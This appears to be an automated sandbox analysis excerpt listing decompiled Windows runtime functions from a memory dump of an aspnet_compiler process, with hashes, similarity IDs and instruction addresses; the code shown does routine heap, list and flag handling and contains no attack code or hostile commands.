                          0x00000000
                          0x01467ce8
                          0x013fc990
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 886ae8aa4f50730714a237eee0883f3853dc0de0a5e0eefa9fae5ba8dd7ba574
                          • Instruction ID: 5f9913fd39d658e3c08210dd9a349bf65a3769d741dc53e1621ecf7cee2f0e18
                          • Opcode Fuzzy Hash: 886ae8aa4f50730714a237eee0883f3853dc0de0a5e0eefa9fae5ba8dd7ba574
                          • Instruction Fuzzy Hash: 251125313006069BC711AF2EDC44A2BBBE9FF9422AB10053EE94587676DB30ED10C7D2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 87%
                          			E014337F5(void* __ecx, intOrPtr* __edx) {
                          				void* __ebx;
                          				void* __edi;
                          				signed char _t6;
                          				intOrPtr _t13;
                          				intOrPtr* _t20;
                          				intOrPtr* _t27;
                          				void* _t28;
                          				intOrPtr* _t29;
                          
                          				_t27 = __edx;
                          				_t28 = __ecx;
                          				if(__edx == 0) {
                          					E01412280(_t6, 0x14e8550);
                          				}
                          				_t29 = E0143387E(_t28);
                          				if(_t29 == 0) {
                          					L6:
                          					if(_t27 == 0) {
                          						E0140FFB0(0x14e8550, _t27, 0x14e8550);
                          					}
                          					if(_t29 == 0) {
                          						return 0xc0000225;
                          					} else {
                          						if(_t27 != 0) {
                          							goto L14;
                          						}
                          						L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
                          						goto L11;
                          					}
                          				} else {
                          					_t13 =  *_t29;
                          					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
                          						L13:
                          						_push(3);
                          						asm("int 0x29");
                          						L14:
                          						 *_t27 = _t29;
                          						L11:
                          						return 0;
                          					}
                          					_t20 =  *((intOrPtr*)(_t29 + 4));
                          					if( *_t20 != _t29) {
                          						goto L13;
                          					}
                          					 *_t20 = _t13;
                          					 *((intOrPtr*)(_t13 + 4)) = _t20;
                          					asm("btr eax, ecx");
                          					goto L6;
                          				}
                          			}











                          0x014337fa
                          0x014337fc
                          0x01433805
                          0x01433808
                          0x01433808
                          0x01433814
                          0x01433818
                          0x01433846
                          0x01433848
                          0x0143384b
                          0x0143384b
                          0x01433852
                          0x00000000
                          0x01433854
                          0x01433856
                          0x00000000
                          0x00000000
                          0x01433863
                          0x00000000
                          0x01433863
                          0x0143381a
                          0x0143381a
                          0x0143381f
                          0x0143386e
                          0x0143386e
                          0x01433871
                          0x01433873
                          0x01433873
                          0x01433868
                          0x00000000
                          0x01433868
                          0x01433821
                          0x01433826
                          0x00000000
                          0x00000000
                          0x01433828
                          0x0143382a
                          0x01433841
                          0x00000000
                          0x01433841

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 257ed55fcb565e259609c85f12f479da423069fb0a9aab3eb2425bd8e04da5d5
                          • Instruction ID: 735064cde7884304c8814e9b93cd2d6981283caab20879dfd6a6b70486242837
                          • Opcode Fuzzy Hash: 257ed55fcb565e259609c85f12f479da423069fb0a9aab3eb2425bd8e04da5d5
                          • Instruction Fuzzy Hash: 9001A172A016119BD33B8F1E9940A27BBE6EFD9A61715446FEA458B335DB30D801C790
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0142002D() {
                          				void* _t11;
                          				char* _t14;
                          				signed char* _t16;
                          				char* _t27;
                          				signed char* _t29;
                          
                          				_t11 = E01417D50();
                          				_t27 = 0x7ffe0384;
                          				if(_t11 != 0) {
                          					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                          				} else {
                          					_t14 = 0x7ffe0384;
                          				}
                          				_t29 = 0x7ffe0385;
                          				if( *_t14 != 0) {
                          					if(E01417D50() == 0) {
                          						_t16 = 0x7ffe0385;
                          					} else {
                          						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                          					}
                          					if(( *_t16 & 0x00000040) != 0) {
                          						goto L18;
                          					} else {
                          						goto L3;
                          					}
                          				} else {
                          					L3:
                          					if(E01417D50() != 0) {
                          						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                          					}
                          					if( *_t27 != 0) {
                          						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
                          							goto L5;
                          						}
                          						if(E01417D50() != 0) {
                          							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                          						}
                          						if(( *_t29 & 0x00000020) == 0) {
                          							goto L5;
                          						}
                          						L18:
                          						return 1;
                          					} else {
                          						L5:
                          						return 0;
                          					}
                          				}
                          			}








                          0x01420032
                          0x01420037
                          0x01420043
                          0x01464b3a
                          0x01420049
                          0x01420049
                          0x01420049
                          0x0142004e
                          0x01420053
                          0x01464b48
                          0x01464b5a
                          0x01464b4a
                          0x01464b53
                          0x01464b53
                          0x01464b5f
                          0x00000000
                          0x01464b61
                          0x00000000
                          0x01464b61
                          0x01420059
                          0x01420059
                          0x01420060
                          0x01464b6f
                          0x01464b6f
                          0x01420069
                          0x01464b83
                          0x00000000
                          0x00000000
                          0x01464b90
                          0x01464b9b
                          0x01464b9b
                          0x01464ba4
                          0x00000000
                          0x00000000
                          0x01464baa
                          0x00000000
                          0x0142006f
                          0x0142006f
                          0x00000000
                          0x0142006f
                          0x01420069

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                          • Instruction ID: 701b81856938e58603c76defffa30d3e9b36c0faee6fab5c1f69f6ced92d955f
                          • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                          • Instruction Fuzzy Hash: 4B11E5726016918FEB238B2DD544B363BE8EB41B58F0D00A2ED04977B2D33CC882C661
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 94%
                          			E0140766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                          				char _v8;
                          				void* _t22;
                          				void* _t24;
                          				intOrPtr _t29;
                          				intOrPtr* _t30;
                          				void* _t42;
                          				intOrPtr _t47;
                          
                          				_push(__ecx);
                          				_t36 =  &_v8;
                          				if(E0142F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
                          					L10:
                          					_t22 = 0;
                          				} else {
                          					_t24 = _v8 + __ecx;
                          					_t42 = _t24;
                          					if(_t24 < __ecx) {
                          						goto L10;
                          					} else {
                          						if(E0142F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
                          							goto L10;
                          						} else {
                          							_t29 = _v8 + _t42;
                          							if(_t29 < _t42) {
                          								goto L10;
                          							} else {
                          								_t47 = _t29;
                          								_t30 = _a16;
                          								if(_t30 != 0) {
                          									 *_t30 = _t47;
                          								}
                          								if(_t47 == 0) {
                          									goto L10;
                          								} else {
                          									_t22 = L01414620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
                          								}
                          							}
                          						}
                          					}
                          				}
                          				return _t22;
                          			}










                          0x01407672
                          0x0140767f
                          0x01407689
                          0x014076de
                          0x014076de
                          0x0140768b
                          0x01407691
                          0x01407693
                          0x01407697
                          0x00000000
                          0x01407699
                          0x014076a8
                          0x00000000
                          0x014076aa
                          0x014076ad
                          0x014076b1
                          0x00000000
                          0x014076b3
                          0x014076b3
                          0x014076b5
                          0x014076ba
                          0x014076bc
                          0x014076bc
                          0x014076c0
                          0x00000000
                          0x014076c2
                          0x014076ce
                          0x014076ce
                          0x014076c0
                          0x014076b1
                          0x014076a8
                          0x01407697
                          0x014076d9

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                          • Instruction ID: ac119ee5a29b18176de03116488407d3b3075e085b966bd97a8b489f8400f35b
                          • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                          • Instruction Fuzzy Hash: 2201B532700119ABC7219E5FCD40E5B7BADEB94671B184936BA4DCF2A0DA31EC0183A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 69%
                          			E013F9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                          				intOrPtr* _t51;
                          				intOrPtr _t59;
                          				signed int _t64;
                          				signed int _t67;
                          				signed int* _t71;
                          				signed int _t74;
                          				signed int _t77;
                          				signed int _t82;
                          				intOrPtr* _t84;
                          				void* _t85;
                          				intOrPtr* _t87;
                          				void* _t94;
                          				signed int _t95;
                          				intOrPtr* _t97;
                          				signed int _t99;
                          				signed int _t102;
                          				void* _t104;
                          
                          				_push(__ebx);
                          				_push(__esi);
                          				_push(__edi);
                          				_t97 = __ecx;
                          				_t102 =  *(__ecx + 0x14);
                          				if((_t102 & 0x02ffffff) == 0x2000000) {
                          					_t102 = _t102 | 0x000007d0;
                          				}
                          				_t48 =  *[fs:0x30];
                          				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                          					_t102 = _t102 & 0xff000000;
                          				}
                          				_t80 = 0x14e85ec;
                          				E01412280(_t48, 0x14e85ec);
                          				_t51 =  *_t97 + 8;
                          				if( *_t51 != 0) {
                          					L6:
                          					return E0140FFB0(_t80, _t97, _t80);
                          				} else {
                          					 *(_t97 + 0x14) = _t102;
                          					_t84 =  *0x14e538c; // 0x776f6828
                          					if( *_t84 != 0x14e5388) {
                          						_t85 = 3;
                          						asm("int 0x29");
                          						asm("int3");
                          						asm("int3");
                          						asm("int3");
                          						asm("int3");
                          						asm("int3");
                          						asm("int3");
                          						asm("int3");
                          						asm("int3");
                          						asm("int3");
                          						asm("int3");
                          						asm("int3");
                          						asm("int3");
                          						_push(0x2c);
                          						_push(0x14cf6e8);
                          						E0144D0E8(0x14e85ec, _t97, _t102);
                          						 *((char*)(_t104 - 0x1d)) = 0;
                          						_t99 =  *(_t104 + 8);
                          						__eflags = _t99;
                          						if(_t99 == 0) {
                          							L13:
                          							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                          							if(__eflags == 0) {
                          								E014C88F5(_t80, _t85, 0x14e5388, _t99, _t102, __eflags);
                          							}
                          						} else {
                          							__eflags = _t99 -  *0x14e86c0; // 0xfa07b0
                          							if(__eflags == 0) {
                          								goto L13;
                          							} else {
                          								__eflags = _t99 -  *0x14e86b8; // 0x0
                          								if(__eflags == 0) {
                          									goto L13;
                          								} else {
                          									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
                          									__eflags =  *((char*)(_t59 + 0x28));
                          									if( *((char*)(_t59 + 0x28)) == 0) {
                          										E01412280(_t99 + 0xe0, _t99 + 0xe0);
                          										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
                          										__eflags =  *((char*)(_t99 + 0xe5));
                          										if(__eflags != 0) {
                          											E014C88F5(0x14e85ec, _t85, 0x14e5388, _t99, _t102, __eflags);
                          										} else {
                          											__eflags =  *((char*)(_t99 + 0xe4));
                          											if( *((char*)(_t99 + 0xe4)) == 0) {
                          												 *((char*)(_t99 + 0xe4)) = 1;
                          												_push(_t99);
                          												_push( *((intOrPtr*)(_t99 + 0x24)));
                          												E0143AFD0();
                          											}
                          											while(1) {
                          												_t71 = _t99 + 8;
                          												 *(_t104 - 0x2c) = _t71;
                          												_t80 =  *_t71;
                          												_t95 = _t71[1];
                          												 *(_t104 - 0x28) = _t80;
                          												 *(_t104 - 0x24) = _t95;
                          												while(1) {
                          													L19:
                          													__eflags = _t95;
                          													if(_t95 == 0) {
                          														break;
                          													}
                          													_t102 = _t80;
                          													 *(_t104 - 0x30) = _t95;
                          													 *(_t104 - 0x24) = _t95 - 1;
                          													asm("lock cmpxchg8b [edi]");
                          													_t80 = _t102;
                          													 *(_t104 - 0x28) = _t80;
                          													 *(_t104 - 0x24) = _t95;
                          													__eflags = _t80 - _t102;
                          													_t99 =  *(_t104 + 8);
                          													if(_t80 != _t102) {
                          														continue;
                          													} else {
                          														__eflags = _t95 -  *(_t104 - 0x30);
                          														if(_t95 !=  *(_t104 - 0x30)) {
                          															continue;
                          														} else {
                          															__eflags = _t95;
                          															if(_t95 != 0) {
                          																_t74 = 0;
                          																 *(_t104 - 0x34) = 0;
                          																_t102 = 0;
                          																__eflags = 0;
                          																while(1) {
                          																	 *(_t104 - 0x3c) = _t102;
                          																	__eflags = _t102 - 3;
                          																	if(_t102 >= 3) {
                          																		break;
                          																	}
                          																	__eflags = _t74;
                          																	if(_t74 != 0) {
                          																		L49:
                          																		_t102 =  *_t74;
                          																		__eflags = _t102;
                          																		if(_t102 != 0) {
                          																			_t102 =  *(_t102 + 4);
                          																			__eflags = _t102;
                          																			if(_t102 != 0) {
                          																				 *0x14eb1e0(_t74, _t99);
                          																				 *_t102();
                          																			}
                          																		}
                          																		do {
                          																			_t71 = _t99 + 8;
                          																			 *(_t104 - 0x2c) = _t71;
                          																			_t80 =  *_t71;
                          																			_t95 = _t71[1];
                          																			 *(_t104 - 0x28) = _t80;
                          																			 *(_t104 - 0x24) = _t95;
                          																			goto L19;
                          																		} while (_t74 == 0);
                          																		goto L49;
                          																	} else {
                          																		_t82 = 0;
                          																		__eflags = 0;
                          																		while(1) {
                          																			 *(_t104 - 0x38) = _t82;
                          																			__eflags = _t82 -  *0x14e84c0;
                          																			if(_t82 >=  *0x14e84c0) {
                          																				break;
                          																			}
                          																			__eflags = _t74;
                          																			if(_t74 == 0) {
                          																				_t77 = E014C9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
                          																				__eflags = _t77;
                          																				if(_t77 == 0) {
                          																					_t74 = 0;
                          																					__eflags = 0;
                          																				} else {
                          																					_t74 = _t77 + 0xfffffff4;
                          																				}
                          																				 *(_t104 - 0x34) = _t74;
                          																				_t82 = _t82 + 1;
                          																				continue;
                          																			}
                          																			break;
                          																		}
                          																		_t102 = _t102 + 1;
                          																		continue;
                          																	}
                          																	goto L20;
                          																}
                          																__eflags = _t74;
                          															}
                          														}
                          													}
                          													break;
                          												}
                          												L20:
                          												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
                          												 *((char*)(_t99 + 0xe5)) = 1;
                          												 *((char*)(_t104 - 0x1d)) = 1;
                          												goto L21;
                          											}
                          										}
                          										L21:
                          										 *(_t104 - 4) = 0xfffffffe;
                          										E013F922A(_t99);
                          										_t64 = E01417D50();
                          										__eflags = _t64;
                          										if(_t64 != 0) {
                          											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                          										} else {
                          											_t67 = 0x7ffe0386;
                          										}
                          										__eflags =  *_t67;
                          										if( *_t67 != 0) {
                          											_t67 = E014C8B58(_t99);
                          										}
                          										__eflags =  *((char*)(_t104 - 0x1d));
                          										if( *((char*)(_t104 - 0x1d)) != 0) {
                          											__eflags = _t99 -  *0x14e86c0; // 0xfa07b0
                          											if(__eflags != 0) {
                          												__eflags = _t99 -  *0x14e86b8; // 0x0
                          												if(__eflags == 0) {
                          													_t94 = 0x14e86bc;
                          													_t87 = 0x14e86b8;
                          													goto L27;
                          												} else {
                          													__eflags = _t67 | 0xffffffff;
                          													asm("lock xadd [edi], eax");
                          													if(__eflags == 0) {
                          														E013F9240(_t80, _t99, _t99, _t102, __eflags);
                          													}
                          												}
                          											} else {
                          												_t94 = 0x14e86c4;
                          												_t87 = 0x14e86c0;
                          												L27:
                          												E01429B82(_t80, _t87, _t94, _t99, _t102, __eflags);
                          											}
                          										}
                          									} else {
                          										goto L13;
                          									}
                          								}
                          							}
                          						}
                          						return E0144D130(_t80, _t99, _t102);
                          					} else {
                          						 *_t51 = 0x14e5388;
                          						 *((intOrPtr*)(_t51 + 4)) = _t84;
                          						 *_t84 = _t51;
                          						 *0x14e538c = _t51;
                          						goto L6;
                          					}
                          				}
                          			}




















                          0x013f9082
                          0x013f9083
                          0x013f9084
                          0x013f9085
                          0x013f9087
                          0x013f9096
                          0x013f9098
                          0x013f9098
                          0x013f909e
                          0x013f90a8
                          0x013f90e7
                          0x013f90e7
                          0x013f90aa
                          0x013f90b0
                          0x013f90b7
                          0x013f90bd
                          0x013f90dd
                          0x013f90e6
                          0x013f90bf
                          0x013f90bf
                          0x013f90c7
                          0x013f90cf
                          0x013f90f1
                          0x013f90f2
                          0x013f90f4
                          0x013f90f5
                          0x013f90f6
                          0x013f90f7
                          0x013f90f8
                          0x013f90f9
                          0x013f90fa
                          0x013f90fb
                          0x013f90fc
                          0x013f90fd
                          0x013f90fe
                          0x013f90ff
                          0x013f9100
                          0x013f9102
                          0x013f9107
                          0x013f910c
                          0x013f9110
                          0x013f9113
                          0x013f9115
                          0x013f9136
                          0x013f913f
                          0x013f9143
                          0x014537e4
                          0x014537e4
                          0x013f9117
                          0x013f9117
                          0x013f911d
                          0x00000000
                          0x013f911f
                          0x013f911f
                          0x013f9125
                          0x00000000
                          0x013f9127
                          0x013f912d
                          0x013f9130
                          0x013f9134
                          0x013f9158
                          0x013f915d
                          0x013f9161
                          0x013f9168
                          0x01453715
                          0x013f916e
                          0x013f916e
                          0x013f9175
                          0x013f9177
                          0x013f917e
                          0x013f917f
                          0x013f9182
                          0x013f9182
                          0x013f9187
                          0x013f9187
                          0x013f918a
                          0x013f918d
                          0x013f918f
                          0x013f9192
                          0x013f9195
                          0x013f9198
                          0x013f9198
                          0x013f9198
                          0x013f919a
                          0x00000000
                          0x00000000
                          0x0145371f
                          0x01453721
                          0x01453727
                          0x0145372f
                          0x01453733
                          0x01453735
                          0x01453738
                          0x0145373b
                          0x0145373d
                          0x01453740
                          0x00000000
                          0x01453746
                          0x01453746
                          0x01453749
                          0x00000000
                          0x0145374f
                          0x0145374f
                          0x01453751
                          0x01453757
                          0x01453759
                          0x0145375c
                          0x0145375c
                          0x0145375e
                          0x0145375e
                          0x01453761
                          0x01453764
                          0x00000000
                          0x00000000
                          0x01453766
                          0x01453768
                          0x014537a3
                          0x014537a3
                          0x014537a5
                          0x014537a7
                          0x014537ad
                          0x014537b0
                          0x014537b2
                          0x014537bc
                          0x014537c2
                          0x014537c2
                          0x014537b2
                          0x013f9187
                          0x013f9187
                          0x013f918a
                          0x013f918d
                          0x013f918f
                          0x013f9192
                          0x013f9195
                          0x00000000
                          0x013f9195
                          0x00000000
                          0x0145376a
                          0x0145376a
                          0x0145376a
                          0x0145376c
                          0x0145376c
                          0x0145376f
                          0x01453775
                          0x00000000
                          0x00000000
                          0x01453777
                          0x01453779
                          0x01453782
                          0x01453787
                          0x01453789
                          0x01453790
                          0x01453790
                          0x0145378b
                          0x0145378b
                          0x0145378b
                          0x01453792
                          0x01453795
                          0x00000000
                          0x01453795
                          0x00000000
                          0x01453779
                          0x01453798
                          0x00000000
                          0x01453798
                          0x00000000
                          0x01453768
                          0x0145379b
                          0x0145379b
                          0x01453751
                          0x01453749
                          0x00000000
                          0x01453740
                          0x013f91a0
                          0x013f91a3
                          0x013f91a9
                          0x013f91b0
                          0x00000000
                          0x013f91b0
                          0x013f9187
                          0x013f91b4
                          0x013f91b4
                          0x013f91bb
                          0x013f91c0
                          0x013f91c5
                          0x013f91c7
                          0x014537da
                          0x013f91cd
                          0x013f91cd
                          0x013f91cd
                          0x013f91d2
                          0x013f91d5
                          0x013f9239
                          0x013f9239
                          0x013f91d7
                          0x013f91db
                          0x013f91e1
                          0x013f91e7
                          0x013f91fd
                          0x013f9203
                          0x013f921e
                          0x013f9223
                          0x00000000
                          0x013f9205
                          0x013f9205
                          0x013f9208
                          0x013f920c
                          0x013f9214
                          0x013f9214
                          0x013f920c
                          0x013f91e9
                          0x013f91e9
                          0x013f91ee
                          0x013f91f3
                          0x013f91f3
                          0x013f91f3
                          0x013f91e7
                          0x00000000
                          0x00000000
                          0x00000000
                          0x013f9134
                          0x013f9125
                          0x013f911d
                          0x013f914e
                          0x013f90d1
                          0x013f90d1
                          0x013f90d3
                          0x013f90d6
                          0x013f90d8
                          0x00000000
                          0x013f90d8
                          0x013f90cf

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 332eb88f82ac98d39f97371df68784deaca3d3c6fe830ea9f3a8bb400f23915e
                          • Instruction ID: 0992b4d9b5c294baa1c1edab35b75c4d35946c66a3031e531126d66d9986f1da
                          • Opcode Fuzzy Hash: 332eb88f82ac98d39f97371df68784deaca3d3c6fe830ea9f3a8bb400f23915e
                          • Instruction Fuzzy Hash: F801AF726016068FD3269F19D840B16BBE9EB8532DF25407BE6058F7A6C774DC41CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 46%
                          			E0148C450(intOrPtr* _a4) {
                          				signed char _t25;
                          				intOrPtr* _t26;
                          				intOrPtr* _t27;
                          
                          				_t26 = _a4;
                          				_t25 =  *(_t26 + 0x10);
                          				if((_t25 & 0x00000003) != 1) {
                          					_push(0);
                          					_push(0);
                          					_push(0);
                          					_push( *((intOrPtr*)(_t26 + 8)));
                          					_push(0);
                          					_push( *_t26);
                          					E01439910();
                          					_t25 =  *(_t26 + 0x10);
                          				}
                          				if((_t25 & 0x00000001) != 0) {
                          					_push(4);
                          					_t7 = _t26 + 4; // 0x4
                          					_t27 = _t7;
                          					_push(_t27);
                          					_push(5);
                          					_push(0xfffffffe);
                          					E014395B0();
                          					if( *_t27 != 0) {
                          						_push( *_t27);
                          						E014395D0();
                          					}
                          				}
                          				_t8 = _t26 + 0x14; // 0x14
                          				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
                          					L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
                          				}
                          				_push( *_t26);
                          				E014395D0();
                          				return L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
                          			}






                          0x0148c458
                          0x0148c45d
                          0x0148c466
                          0x0148c468
                          0x0148c469
                          0x0148c46a
                          0x0148c46b
                          0x0148c46e
                          0x0148c46f
                          0x0148c471
                          0x0148c476
                          0x0148c476
                          0x0148c47c
                          0x0148c47e
                          0x0148c480
                          0x0148c480
                          0x0148c483
                          0x0148c484
                          0x0148c486
                          0x0148c488
                          0x0148c48f
                          0x0148c491
                          0x0148c493
                          0x0148c493
                          0x0148c48f
                          0x0148c498
                          0x0148c49e
                          0x0148c4ad
                          0x0148c4ad
                          0x0148c4b2
                          0x0148c4b4
                          0x0148c4cd

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                          • Instruction ID: 47cbbb63bdc3dd9a270ffa53171d76f4f1ddb5a30fe225b19c27c7b3624a2989
                          • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                          • Instruction Fuzzy Hash: 68018472140506BFE611AF6ACC80EA7BB6DFFA4755F00452AF214426B0C771ACA0C6A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 86%
                          			E014C4015(signed int __eax, signed int __ecx) {
                          				void* __ebx;
                          				void* __edi;
                          				signed char _t10;
                          				signed int _t28;
                          
                          				_push(__ecx);
                          				_t28 = __ecx;
                          				asm("lock xadd [edi+0x24], eax");
                          				_t10 = (__eax | 0xffffffff) - 1;
                          				if(_t10 == 0) {
                          					_t1 = _t28 + 0x1c; // 0x1e
                          					E01412280(_t10, _t1);
                          					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                          					E01412280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x14e86ac);
                          					E013FF900(0x14e86d4, _t28);
                          					E0140FFB0(0x14e86ac, _t28, 0x14e86ac);
                          					 *((intOrPtr*)(_t28 + 0x20)) = 0;
                          					E0140FFB0(0, _t28, _t1);
                          					_t18 =  *((intOrPtr*)(_t28 + 0x94));
                          					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
                          						L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
                          					}
                          					_t10 = L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                          				}
                          				return _t10;
                          			}







                          0x014c401a
                          0x014c401e
                          0x014c4023
                          0x014c4028
                          0x014c4029
                          0x014c402b
                          0x014c402f
                          0x014c4043
                          0x014c4046
                          0x014c4051
                          0x014c4057
                          0x014c405f
                          0x014c4062
                          0x014c4067
                          0x014c406f
                          0x014c407c
                          0x014c407c
                          0x014c408c
                          0x014c408c
                          0x014c4097

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 31f78e30b8420fa6cb1be0074a0e96e85624b61482d1287722ad995c8b90caa1
                          • Instruction ID: c62d84d459f779b606421f94a01f013350c1d6f7d1f742a7b0d0c6686b0f1e5d
                          • Opcode Fuzzy Hash: 31f78e30b8420fa6cb1be0074a0e96e85624b61482d1287722ad995c8b90caa1
                          • Instruction Fuzzy Hash: 700184722415467FD651AB7ACE84E57B7ACFB65660B00022FB518C3A71CB34EC11CAE4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 61%
                          			E014B138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                          				signed int _v8;
                          				intOrPtr _v16;
                          				intOrPtr _v20;
                          				intOrPtr _v24;
                          				intOrPtr _v28;
                          				short _v54;
                          				char _v60;
                          				void* __edi;
                          				void* __esi;
                          				signed char* _t21;
                          				intOrPtr _t27;
                          				intOrPtr _t33;
                          				intOrPtr _t34;
                          				signed int _t35;
                          
                          				_t32 = __edx;
                          				_t27 = __ebx;
                          				_v8 =  *0x14ed360 ^ _t35;
                          				_t33 = __edx;
                          				_t34 = __ecx;
                          				E0143FA60( &_v60, 0, 0x30);
                          				_v20 = _a4;
                          				_v16 = _a8;
                          				_v28 = _t34;
                          				_v24 = _t33;
                          				_v54 = 0x1033;
                          				if(E01417D50() == 0) {
                          					_t21 = 0x7ffe0388;
                          				} else {
                          					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                          				}
                          				_push( &_v60);
                          				_push(0x10);
                          				_push(0x20402);
                          				_push( *_t21 & 0x000000ff);
                          				return E0143B640(E01439AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                          			}

















                          0x014b138a
                          0x014b138a
                          0x014b1399
                          0x014b13a3
                          0x014b13a8
                          0x014b13aa
                          0x014b13b5
                          0x014b13bb
                          0x014b13c3
                          0x014b13c6
                          0x014b13c9
                          0x014b13d4
                          0x014b13e6
                          0x014b13d6
                          0x014b13df
                          0x014b13df
                          0x014b13f1
                          0x014b13f2
                          0x014b13f4
                          0x014b13f9
                          0x014b140e

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 089d449b1abee8507104b68f3b380e95b9dbab901a0b99776e912d7d4b683d31
                          • Instruction ID: 8f5e66fc0dc61827a0dcd295cf7788c609a0b55a8dd3b789340d5de2be59cb61
                          • Opcode Fuzzy Hash: 089d449b1abee8507104b68f3b380e95b9dbab901a0b99776e912d7d4b683d31
                          • Instruction Fuzzy Hash: 70019271E01209AFDB10EFA9D881FAEBBB8EF54700F00405BB904EB390E6749A01C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 61%
